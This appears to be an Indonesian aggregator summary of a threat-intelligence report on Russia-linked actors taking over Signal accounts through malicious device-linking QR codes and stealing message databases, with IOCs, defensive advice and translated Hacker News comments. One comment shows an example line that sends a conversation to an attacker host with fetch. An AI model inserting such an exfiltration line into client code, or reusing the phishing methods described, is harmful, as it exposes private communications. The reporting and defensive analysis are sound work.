1 poin oleh GN⁺ 2025-02-20 | 2 komentar | Bagikan ke WhatsApp
  • Akun Signal yang digunakan oleh pihak-pihak yang menjadi perhatian badan intelijen Rusia menjadi target utama, dengan meningkatnya upaya pembobolan akun yang menyasar komunikasi sensitif pemerintah dan militer
  • Taktik yang paling banyak digunakan adalah menyalahgunakan fitur resmi Linked Devices untuk membuat korban memindai kode QR berbahaya, lalu menyinkronkan pesan secara real time ke perangkat penyerang
  • UNC5792 menyasar penautan perangkat melalui undangan grup Signal palsu, UNC4221 melalui kit phishing bertema Kropyva dan peringatan keamanan palsu, sementara APT44 melalui akses ke perangkat yang disita
  • APT44, Turla, UNC1151 yang terkait Belarus, dan lainnya juga mengoperasikan kemampuan untuk mencuri database Signal atau pesan dan lampiran Signal Desktop di lingkungan Android dan Windows
  • Masalah ini tidak terbatas pada Signal; WhatsApp dan Telegram juga menjadi target serupa, sehingga pengguna perlu memperbarui aplikasi, memeriksa perangkat tertaut, berhati-hati terhadap kode QR, dan memakai kunci layar yang kuat

Aktivitas terkait Rusia yang menargetkan akun Signal

  • Google Threat Intelligence Group(GTIG) mengonfirmasi bahwa beberapa pelaku ancaman yang terkait negara Rusia meningkatkan upaya pembobolan akun Signal Messenger
  • Target utamanya adalah individu yang menjadi perhatian badan intelijen Rusia, dan setelah invasi ulang ke Ukraina, kebutuhan masa perang untuk mengakses komunikasi sensitif pemerintah dan militer mendorong meningkatnya aktivitas ini
  • Signal adalah messenger aman yang digunakan oleh tentara, politisi, jurnalis, aktivis, dan komunitas berisiko tinggi, sehingga menjadi target bernilai tinggi untuk aktivitas pengawasan dan intelijen
  • Ancaman serupa juga meluas ke messenger populer lain seperti WhatsApp dan Telegram, dengan kelompok terkait Rusia menerapkan teknik yang mirip
  • Rilis Signal terbaru untuk Android dan iOS menyertakan penguatan yang membantu bertahan dari kampanye phishing serupa
    • Pengguna harus memperbarui ke versi terbaru agar dapat menggunakan fitur tersebut

Cara penyalahgunaan fitur Linked Devices

  • Teknik paling baru dan paling luas digunakan adalah penyalahgunaan linked devices, fitur resmi Signal
  • Signal biasanya meminta pemindaian kode QR saat menghubungkan perangkat tambahan agar dapat digunakan di beberapa perangkat sekaligus
  • Pelaku ancaman membuat kode QR berbahaya yang, ketika dipindai korban, akan menghubungkan instance Signal yang dikendalikan penyerang ke akun korban
  • Jika koneksi berhasil, pesan berikutnya akan disinkronkan dan dikirim secara real time ke korban dan penyerang, sehingga percakapan aman dapat terus disadap tanpa perlu membobol seluruh perangkat
  • Dalam phishing jarak jauh, kode QR berbahaya biasanya disamarkan sebagai berikut
    • Undangan grup Signal
    • Peringatan keamanan
    • Panduan pairing perangkat resmi di situs web Signal
  • Dalam phishing jarak jauh yang lebih disesuaikan, kode QR penautan perangkat berbahaya disisipkan ke halaman phishing yang tampak seperti aplikasi khusus yang digunakan militer Ukraina
  • Cara yang sama juga digunakan dalam operasi akses jarak dekat
    • APT44 memungkinkan pasukan Rusia yang dikerahkan di medan perang menautkan akun Signal pada perangkat yang disita ke infrastruktur yang dikendalikan penyerang untuk dieksploitasi lebih lanjut
  • Pembobolan akun melalui perangkat yang baru ditautkan cenderung menjadi akses awal bersinyal rendah karena kurangnya deteksi dan pertahanan teknis terpusat
    • Jika berhasil, ada risiko pembobolan tidak terdeteksi dalam jangka panjang

UNC5792: undangan grup Signal yang dimodifikasi

  • UNC5792 adalah klaster yang dicurigai sebagai aktivitas spionase Rusia, dan sebagian tumpang tindih dengan UAC-0195 milik CERT-UA
  • Kelompok ini memodifikasi halaman group invite resmi Signal dan menggunakannya dalam kampanye phishing
  • Dalam alur normal, pengguna dialihkan ke grup Signal, tetapi halaman yang dimodifikasi mengirim korban ke URL berbahaya yang menautkan perangkat yang dikendalikan penyerang ke akun Signal korban
  • Infrastruktur yang dikendalikan penyerang dikonfigurasi agar terlihat seperti undangan grup Signal yang sah
  • JavaScript pada undangan grup palsu mengganti redirect umum untuk bergabung ke grup Signal dengan blok berbahaya yang berisi URI penautan perangkat baru Signal berbentuk sgnl://linkdevice?uuid=
  • Domain contoh yang teridentifikasi adalah signal-groups[.]tech

UNC4221: kit phishing Signal yang disesuaikan

  • UNC4221 adalah pelaku ancaman terkait Rusia yang dilacak CERT-UA sebagai UAC-0185, dan secara aktif menargetkan akun Signal yang digunakan tentara Ukraina
  • Kelompok ini mengoperasikan kit phishing Signal kustom yang tampak seperti komponen aplikasi Kropyva yang digunakan militer Ukraina untuk panduan artileri
  • UNC4221 juga, mirip dengan UNC5792, menyamarkan fungsi penautan perangkat sebagai undangan grup Signal dari kontak tepercaya
  • Varian kit phishing yang diamati memiliki beberapa bentuk
    • Situs phishing yang mengalihkan korban ke infrastruktur phishing tahap kedua yang terlihat seperti panduan penautan perangkat resmi dari Signal
    • Situs web yang menyisipkan kode QR penautan perangkat berbahaya langsung ke kit phishing dasar bertema Kropyva
    • Halaman phishing dari operasi awal tahun 2022 yang dibuat agar tampak seperti peringatan keamanan resmi Signal
  • Contoh domain dan halaman antara lain signal-confirm[.]site, teneta.add-group[.]site, signal-protect[.]host
  • UNC4221 juga menggunakan payload JavaScript ringan bernama PINPOINT sebagai komponen inti penargetan Signal
    • PINPOINT mengumpulkan informasi dasar pengguna dan data lokasi melalui GeoLocation API browser
  • Dalam operasi serupa di masa depan, pesan aman dan data lokasi kemungkinan besar akan menjadi target bersamaan
    • Keduanya terutama akan disasar bersamaan dalam konteks operasi pengawasan target atau dukungan untuk operasi militer konvensional

Aktivitas terkait Rusia dan Belarus untuk mencuri pesan Signal

  • Selain menautkan perangkat tambahan ke akun korban, beberapa pelaku ancaman regional yang dikenal juga mengoperasikan kemampuan untuk mencuri file database Signal dari perangkat Android dan Windows
  • APT44 menggunakan skrip Windows Batch ringan bernama WAVESIGN
    • Secara berkala mengambil pesan Signal dari database Signal korban
    • Mengeksfiltrasi pesan terbaru dengan Rclone
  • Malware Android Infamous Chisel yang dilaporkan pada 2023 oleh Security Service of Ukraine(SSU) Ukraina dan National Cyber Security Centre(NCSC) Inggris diatribusikan kepada Sandworm
    • Malware ini dirancang untuk secara rekursif mencari daftar ekstensi file, termasuk database lokal dari beberapa aplikasi messenger seperti Signal, pada perangkat Android
  • Turla adalah pelaku ancaman Rusia yang diatribusikan kepada FSB Center 16 Rusia
    • Setelah pembobolan, mereka mengoperasikan skrip PowerShell ringan yang menyiapkan eksfiltrasi pesan Signal Desktop di lingkungan Windows
  • UNC1151 yang terkait Belarus menggunakan utilitas command-line Robocopy
    • Mereka melakukan staging terhadap isi direktori file tempat Signal Desktop menyimpan pesan dan lampiran agar dapat dieksfiltrasi kemudian

Langkah pertahanan untuk pengguna messenger aman

  • Fokus beberapa pelaku ancaman pada Signal menunjukkan bahwa ancaman terhadap aplikasi messenger aman dapat meningkat dalam jangka pendek
  • Seiring pertumbuhan industri spyware komersial dan meningkatnya varian malware mobile yang digunakan di wilayah konflik, permintaan atas kapabilitas siber ofensif untuk memantau komunikasi sensitif juga meningkat
  • Ancaman tidak hanya terbatas pada operasi siber jarak jauh seperti phishing dan pengiriman malware
    • Operasi akses jarak dekat, ketika penyerang dapat mengakses perangkat target yang tidak terkunci untuk sementara waktu, juga merupakan risiko penting
  • Selain Signal, WhatsApp dan Telegram juga masuk dalam prioritas target terbaru beberapa kelompok terkait Rusia
    • Microsoft Threat Intelligence membahas kampanye COLDRIVER, UNC4057, dan Star Blizzard yang mencoba menyalahgunakan fitur Linked Devices untuk membobol akun WhatsApp dalam artikel blog terbaru
  • Pengguna yang dapat menjadi target aktivitas intrusi yang didukung pemerintah harus menerapkan kebiasaan pertahanan berikut
    • Aktifkan kunci layar di semua perangkat mobile, dan gunakan kata sandi panjang serta kompleks yang mencampurkan huruf besar, huruf kecil, angka, dan simbol
    • Android mendukung kata sandi alfanumerik, yang memberikan keamanan jauh lebih tinggi daripada PIN angka atau pola
    • Instal pembaruan sistem operasi sesegera mungkin dan selalu pertahankan Signal serta aplikasi messenger lain pada versi terbaru
    • Aktifkan Google Play Protect, yang aktif secara default pada perangkat Android dengan Google Play Services
    • Periksa secara berkala bagian “Linked devices” di pengaturan aplikasi untuk mencari perangkat yang tidak disetujui
    • Berhati-hatilah terhadap kode QR dan sumber daya web yang tampak seperti pembaruan perangkat lunak, undangan grup, atau notifikasi lain yang mendorong tindakan segera
    • Jika memungkinkan, gunakan autentikasi dua faktor seperti sidik jari, pengenalan wajah, security key, atau kode sekali pakai untuk memverifikasi login akun atau penautan perangkat baru
    • Pengguna iPhone yang khawatir menjadi sasaran pengawasan atau spionase sebaiknya mempertimbangkan mengaktifkan Lockdown Mode untuk mengurangi attack surface

Indikator kompromi dan ringkasan teknik yang diamati

  • Untuk membantu hunting dan identifikasi oleh organisasi, indikator kompromi disertakan dalam GTI Collection bagi pengguna terdaftar
  • Contoh indikator kompromi terkait adalah sebagai berikut
    • UNC5792: e078778b62796bab2d7ab2b04d6b01bf, contoh kode HTML undangan grup yang dimodifikasi
    • Halaman phishing undangan grup palsu UNC5792: add-signal-group[.]com, add-signal-groups[.]com, group-signal[.]com, groups-signal[.]site, signal-device-off[.]online, signal-group-add[.]com, signal-group[.]site, signal-group[.]tech, signal-groups-add[.]com, signal-groups[.]site, signal-groups[.]tech, signal-security[.]online, signal-security[.]site, signalgroup[.]site, signals-group[.]com
    • Halaman phishing panduan penautan perangkat UNC4221: signal-confirm[.]site, confirm-signal[.]site
    • Peringatan keamanan Signal palsu UNC4221: signal-protect[.]host
    • Undangan grup Kropyva palsu UNC4221: teneta.join-group[.]online, teneta.add-group[.]site, group-teneta[.]online, helperanalytics[.]ru, teneta[.]group, group.kropyva[.]site
    • APT44: 150.107.31[.]194:18000, kode QR penautan perangkat yang dibuat dinamis dan disediakan oleh APT44
    • Skrip Batch WAVESIGN APT44: a97a28276e4f88134561d938f60db495, b379d8f583112cad3cf60f95ab3a67fd, b27ff24870d93d651ee1d8e06276fa98
  • Taktik dan teknik yang diamati berdasarkan pelaku ancaman adalah sebagai berikut
    • UNC5792: memasangkan pesan Signal korban ke perangkat yang dikendalikan penyerang melalui phishing jarak jauh menggunakan undangan grup palsu
    • UNC4221: memasangkan pesan Signal korban ke perangkat yang dikendalikan penyerang melalui phishing jarak jauh menggunakan aplikasi web militer palsu dan peringatan keamanan
    • APT44: menyalahgunakan perangkat yang diakses secara fisik untuk memasangkan pesan Signal korban ke perangkat yang dikendalikan penyerang
    • APT44: menargetkan eksfiltrasi file database Signal dengan malware Android Infamous Chisel
    • APT44: secara berkala mengeksfiltrasi pesan Signal terbaru melalui Rclone menggunakan skrip Windows Batch
    • Turla: melakukan aktivitas pencurian database Signal Desktop setelah membobol lingkungan Windows
    • UNC1151: menyiapkan direktori file Signal Desktop untuk eksfiltrasi dengan Robocopy

2 komentar

 
ndrgrd 2025-02-20

Memang benar ada kerentanannya, tetapi lucu juga kalau Telegram—yang bahkan chat grupnya tidak terenkripsi dengan semestinya—mengkritik soal keamanan.

 
GN⁺ 2025-02-20
Komentar Hacker News
  • Aplikasi yang memiliki workflow perangkat tertaut seperti Signal sudah cukup lama berisiko
    Tahun lalu ketika Telegram merendahkan Signal, poin ini juga disorot (https://news.ycombinator.com/context?id=40303736), dan menurut saya implementasi perangkat tertaut Signal sudah bermasalah sejak lama: https://eprint.iacr.org/2021/626.pdf
    Justru mengejutkan bahwa butuh waktu selama ini sampai contoh serangan nyata muncul di literatur publik. Sikap Signal yang menganggap serangan ini berada di luar model ancaman mereka juga tidak membantu. Menurut makalah tersebut, Signal menerima laporan pada 20 Oktober 2020 dan membalas pada 28 Oktober, dengan menyatakan bahwa kompromi kunci rahasia jangka panjang tidak termasuk dalam model adversary mereka

    • Jika saya membacanya dengan benar, serangan ini mengasumsikan bahwa penyerang sudah memiliki kunci privat (IK) yang hanya tersimpan di perangkat pengguna serta kata sandi pengguna
      Kalau begitu, mereka harus memiliki akses fisik ke salah satu perangkat korban atau ada backdoor lain, dan pada titik itu rasanya sudah kalah, bukan? Koreksi jika saya keliru. Keamanan hardware fisik dan pencegahan phishing tampaknya tetap menjadi inti masalah
    • Serangan dalam makalah itu mengasumsikan bahwa kunci identitas privat jangka panjang (IK) milik pengguna, yang dipakai untuk menurunkan kunci-kunci lain dalam protokol Signal, sudah dicuri
      Di luar laboratorium, cara mendapatkannya umumnya hanya dengan memperoleh akses root ke perangkat pengguna, atau mencuri cadangan chat terbaru. Kampanye yang ditemukan Google lebih mirip phishing sehingga secara teknis kurang serius, tetapi bagaimana memperingatkan pengguna bahwa mereka sedang melakukan tindakan berbahaya adalah persoalan sulit yang melibatkan seluruh aspek keamanan usabilitas. Ini akan menjadi masalah yang makin penting di Signal ketika penambahan perangkat tertaut baru mulai menyalin riwayat pesan dan lampiran dari 45 hari terakhir
    • Saya penasaran apakah tidak memakai fitur perangkat tertaut juga mengurangi permukaan serangan ini
  • Yang makin saya rasakan belakangan ini adalah bahwa enkripsi end-to-end pada akhirnya mengharuskan klien bisa dibangun dan diverifikasi langsung oleh pengguna akhir
    Saya sedang membuat layanan chat AI terenkripsi berbasis CRDT terenkripsi, dan cukup dengan menambahkan satu baris fetch atau pelacak analitik di sisi rendering, keamanan yang dijanjikan protokol menjadi tidak berguna. Lebih jauh lagi, kita juga harus memercayai sistem operasi tempat rendering dijalankan
    Meski klien dibuat open source dan bisa dibangun secara reproducible, distribusinya tetap harus lewat iOS Store, dan apa pun bisa terjadi dalam proses publikasinya. Saya mengambil iOS sebagai contoh karena mengunggah aplikasi hasil build sendiri memang sangat rumit. Jika chat-nya multipihak, pihak lawan bicara juga harus melalui proses yang sama
    Walau memakai segala macam protokol keren dan enkripsi transport terbaik, pada akhirnya semuanya adalah soal kepercayaan. Saya khawatir, saat memakai sesuatu seperti Signal, orang justru menjadi target pengawasan di bawah ilusi bahwa itu adalah lingkungan yang sepenuhnya aman. Jika lembaga pemerintah ingin melakukan pengawasan, mereka kemungkinan akan memusatkan sumber daya pada pengguna Signal, yang dianggap punya paling banyak hal untuk disembunyikan
    Kadang rasanya semua tidak berarti selain penyimpanan terenkripsi. Aneh juga bahwa sebagian besar diskusi berhenti pada validitas protokol keamanan yang berpusat pada matematika. Padahal satu baris di lapisan rendering seperti fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>;)", {body: JSON.stringify(convo)}) bisa melewati semuanya; saya penasaran bagaimana orang memikirkan hal ini

    • Pada akhirnya, jika kita tidak mengendalikan seluruh pipeline, mulai dari pasir yang menjadi silikon CPU, sistem operasi, sampai cara paket diteruskan, maka di suatu tempat kita harus menaruh akar kepercayaan
      Menghilangkan kepercayaan tampaknya mustahil; kita hanya memindahkan apa yang dipercaya atau menyembunyikannya di balik abstraksi. Yang akan makin penting ke depan adalah mekanisme yang bisa membuktikan dengan jelas ketika pihak yang kita percayai sampai tingkat tertentu bertindak jahat, dan membuat mereka bertanggung jawab
      Contohnya log transparansi sertifikat untuk mencegah serangan man-in-the-middle, build reproducible untuk memastikan biner yang diterima cocok dengan kode open source publik, serta transparansi kunci di WhatsApp/Signal/iMessage untuk memastikan kunci publik yang diterima adalah yang diharapkan, bukan kunci NSA
    • Rasanya seperti keretanya diletakkan di depan kudanya: orang makin terobsesi pada status teoretis metode enkripsi, sementara risiko nyata dari berbagai konsekuensinya dikesampingkan
      Sistem yang terlalu ingin aman bisa membuat pengguna tidak bisa membaca pesannya sendiri, dan akhirnya mendorong mereka ke sistem yang kurang aman. Di Matrix pun pernah ada masalah karena klien tidak menjelaskan dengan jelas bahwa jika logout, pengguna bisa kehilangan pesan secara permanen
      Sebagian persyaratan kuat seperti perfect forward secrecy bisa, secara praktis, bertentangan dengan apa yang diinginkan pengguna dari messaging. Yang diinginkan pengguna adalah “pesan saya bisa saya lihat kapan saja, dan orang lain sama sekali tidak bisa melihatnya”, tetapi itu sangat sulit. Ada ketegangan mendasar antara keamanan, reset kata sandi, dan pemulihan saat ponsel hilang
      Jika orang benar-benar memahami konsekuensi yang mungkin terjadi, cukup banyak yang mungkin tidak menginginkan enkripsi end-to-end paling kuat. Mereka mungkin lebih menginginkan jaminan hukum yang kuat seperti “kalau orang lain melihat pesan saya, ia dipenjara seumur hidup”. Ada juga orang yang menginginkan keamanan teknis tingkat tertinggi, tetapi jika desain mengikuti prioritas itu, akan ada efek balik bagi pengguna yang tidak menerima kompromi tersebut
    • Menurut saya, cukup tidak masuk akal membangun sesuatu yang harus benar-benar aman sampai perlu mengkhawatirkan perbedaan antara enkripsi end-to-end dan enkripsi klien-server di atas iOS dan Google Play Services
      Orang yang peduli pada tingkat keamanan seperti itu akan berusaha memakai sesuatu selain iPhone. Ketika para pendukung Signal menyebut pengguna sistem kripto yang tidak mereka sukai sebagai LARPer, itu terlihat seperti proyeksi klasik. Kecuali untuk kasus orang yang bekerja di pemerintah AS, saya kurang tahu model ancaman nyata apa yang benar-benar cocok untuk Signal
      Jelas juga ada efek lampu jalan pada para peneliti kriptografi akademis yang berfokus pada algoritma matematis. Sekarang cakupan yang bisa mendapat dana riset keamanan memang sedikit lebih luas, sampai mencakup model mainan protokol messaging end-to-end, tetapi masih belum cukup untuk mencakup keseluruhan jalur manusia-ke-manusia yang benar-benar penting
    • Sebagian dari yang Anda maksud juga disebut attestation
      Pada dasarnya, root yang dipercaya menandatangani sesuatu agar kita bisa memastikan tanpa ragu bahwa entitas yang berinteraksi berasal dari kombinasi ponsel+sistem operasi+aplikasi tertentu
      Android memilikinya; misalnya, ia bisa mengonfirmasi kepada pihak ketiga bahwa bootloader terkunci, ada tanda tangan Google, dan sistem operasi Google sedang berjalan. Secara teori, mungkin juga membuat pihak jarak jauh menerima perangkat lunak “asli” seperti ponsel Google+Lineage OS dengan rantai kepercayaan berbeda
      Aplikasi juga bisa memverifikasi tanda tangan aplikasi yang dapat diakses oleh sistem operasi dan, jika perlu, memberikannya kepada pihak jarak jauh. Artefak attestation yang sepenuhnya transparan dan tidak membabi buta memercayai satu entitas seperti Google bisa memakai ledger berisi hash dan biner komponen yang diverifikasi, alih-alih root kepercayaan berbasis tanda tangan
      Semuanya secara teknis memungkinkan, tetapi belum diimplementasikan dengan cara yang benar-benar tersedia saat ini. Jika minatnya cukup besar, saya rasa pada akhirnya itu akan diimplementasikan
    • Masalah yang Anda ajukan memang nyata, tetapi sepertinya kita lupa kondisi komunikasi 10–15 tahun lalu
      Saat itu hampir tidak ada yang dienkripsi, melakukan apa pun di Wi-Fi publik seperti bermain roulette Rusia, dan badan intelijen sinyal menikmati masa keemasan. Pada masa itu, enkripsi jaringan memang punya prioritas lebih tinggi
  • Tidak tertulis jelas di artikel, tetapi sejauh pemahaman saya, tahap pertama dari salah satu serangan adalah mengambil smartphone prajurit yang gugur

    • Artikel itu mengatakan mereka membuat kode QR berbahaya sehingga korban menghubungkan perangkat penyerang ke Signal
      Jika berhasil, pesan-pesan berikutnya akan dikirim secara real-time secara bersamaan ke korban dan penyerang
    • Kalau bicara serius, ini mengangkat masalah smartphone yang menjadi perlengkapan standar bagi prajurit
      Namun smartphone menyediakan platform komputasi dan komunikasi yang kuat bagi setiap prajurit, bahkan tanpa pelatihan khusus. Masalahnya adalah bagaimana membuatnya aman, termasuk dari risiko yang disebut di komentar teratas
      Sepertinya ada pihak yang sedang meneliti cara melindunginya sampai cukup kuat sehingga badan intelijen Rusia pun tidak bisa mengeksploitasinya secara efektif. Jika solusi seperti itu menyebar luas, ia juga bisa diterapkan dengan baik pada privasi warga sipil. Melindungi ponsel warga sipil Ukraina dari penyerang Rusia juga bukan ide buruk
    • Prajurit tidak diizinkan membawa ponsel
  • Jika yang dimaksud adalah perangkat bisa ditautkan hanya dengan sekali memindai kode QR, rasanya itu memang celah
    Seharusnya perangkat tidak boleh langsung tertaut hanya karena kodenya dipindai; harus ada konfirmasi manual seperti “Ya, saya akan menautkan perangkat ini.” Dengan begitu, meskipun pengguna memindainya karena mengira itu kode undangan grup, mereka bisa menyadari bahwa sebenarnya bukan itu. Tentu pengguna tetap harus menyadarinya, tetapi ini perbaikan yang berarti dibanding “saya memindai karena mengira itu kode untuk bergabung ke grup, lalu diam-diam perangkat lain tertaut”

    • Perlu diingat bahwa Signal dirancang untuk pengguna nonteknis
      Banyak pengguna tidak memahami hal-hal seperti kode QR, tautan, atau penautan, dan tidak memikirkannya secara mendalam. Mereka menebak dan menekan secara spontan serta naluriah, sering kali mengklik hanya untuk menyingkirkannya dari layar dan kembali ke hal yang sedang dikerjakan. Saya tidak tahu apakah ada dasar untuk menganggap tidak ada proses konfirmasi; mungkin bisa dilihat di dokumentasi Signal
  • Artikel terkait: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
    Saya melihatnya lewat https://news.ycombinator.com/item?id=43103692, tetapi tidak ada komentar di sana

  • Kabar baiknya, ada alasan mengapa ia menjadi target. Artinya Signal masih efektif

  • Ada banyak suara yang ingin mengatakan Signal sudah dikompromikan, tetapi hampir dalam semua kasus perlu diperhatikan bahwa pihak tersebut kurang bersifat open source dibanding Signal
    Meski menjadi perusahaan berskala web, Signal berusaha sebaik mungkin untuk melindungi hak asasi manusia. Martabat individu itu penting. Ini bukan sekadar percakapan biasa

    • Saya bingung “siapa” yang dimaksud mengompromikannya. Rusia, atau badan intelijen AS?
      Saya sempat melihat anggota dewan di situs Signal Foundation, dan melihat frasa seperti Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow, dan Foreign Affairs Policy Board di U.S. Department of State
      Orang-orang seperti ini terdengar seperti bagian dari dunia intelijen. Saya penasaran apa sebenarnya yang mereka lakukan di dewan Signal, sebuah aplikasi perpesanan open source. Saya setuju bahwa ini bukan sekadar percakapan biasa
    • Telegram khususnya jauh lebih buruk. Ia memakai enkripsi sendiri dan protokol sendiri, secara default sama sekali tidak menyediakan enkripsi ujung-ke-ujung, dan menyimpan semuanya di server dalam bentuk teks polos
    • Secara umum ini lingkungan yang rumit dengan banyak disinformasi, terutama untuk target bernilai seperti Signal
      Jika Signal aman, pihak yang menyerang privasi akan ingin orang percaya Signal sudah dikompromikan dan memakai sesuatu yang lain. Jika tidak aman, sebaliknya mereka akan ingin orang percaya Signal aman
      Menurut saya solusinya adalah sepenuhnya mengabaikan sumber disinformasi potensial, terutama pengguna acak di media sosial. Termasuk HN. Ini sulit ketika pusat sosial berada di tempat seperti itu, dan kita harus mengecualikan diri sendiri. Harus dibatasi pada suara yang sah dan dapat dipercaya
    • Saya tidak menyangka masih ada orang yang memakai istilah “berskala web” secara serius
      “MongoDB berskala web. Cukup nyalakan dan langsung bisa diskalakan”
  • Di menu pengaturan, Anda bisa memeriksa apakah ada perangkat tertaut yang tidak terduga

    • Saya penasaran apakah sebaiknya Signal selalu menampilkan perangkat tertaut langsung di antarmuka pengguna
      Cukup berupa ikon kecil seperti “3 perangkat tertaut aktif”
    • Ide bagus. Saya akan mengirim kode QR
  • Beberapa domain disediakan, tetapi tidak semuanya terdaftar
    Misalnya signal-protect[.]host dan kropyva[.]site tersedia, sementara signal-confirm[.]site terdaftar di Ukraina. Sebagian terdaftar di Rusia
    Negara yang sedang berperang, dari pihak mana pun, tidak boleh dipercaya. A menyalahkan B dan B menyalahkan A, tetapi kedua pihak sama-sama punya agenda sendiri

    • Meski signal-confirm[.]site terdaftar di Ukraina, data WHOIS biasanya sering palsu, jadi sulit menjadikannya dasar
      Rusia diketahui juga memakai kredensial atau kartu SIM curian dari negara tetangga, termasuk Ukraina, untuk hal semacam ini
    • Menganggap bahwa domain pelaku jahat yang terdaftar di Ukraina otomatis bergerak demi kepentingan Ukraina, atau bahwa otoritas Ukraina mengetahuinya, adalah kesalahan
      Sayangnya, aktor negara Rusia pun tidak punya masalah beroperasi dari dalam Ukraina. Tambahkan lagi para kriminal kacau yang mengikuti pihak yang membayar lebih, serta orang-orang yang setiap hari bolak-balik antara wilayah yang sementara diduduki Rusia dan Ukraina, dan situasinya cepat menjadi rumit
    • Domain yang belum terdaftar pun bisa menjadi indikator kompromi jika, misalnya, ditemukan dalam analisis payload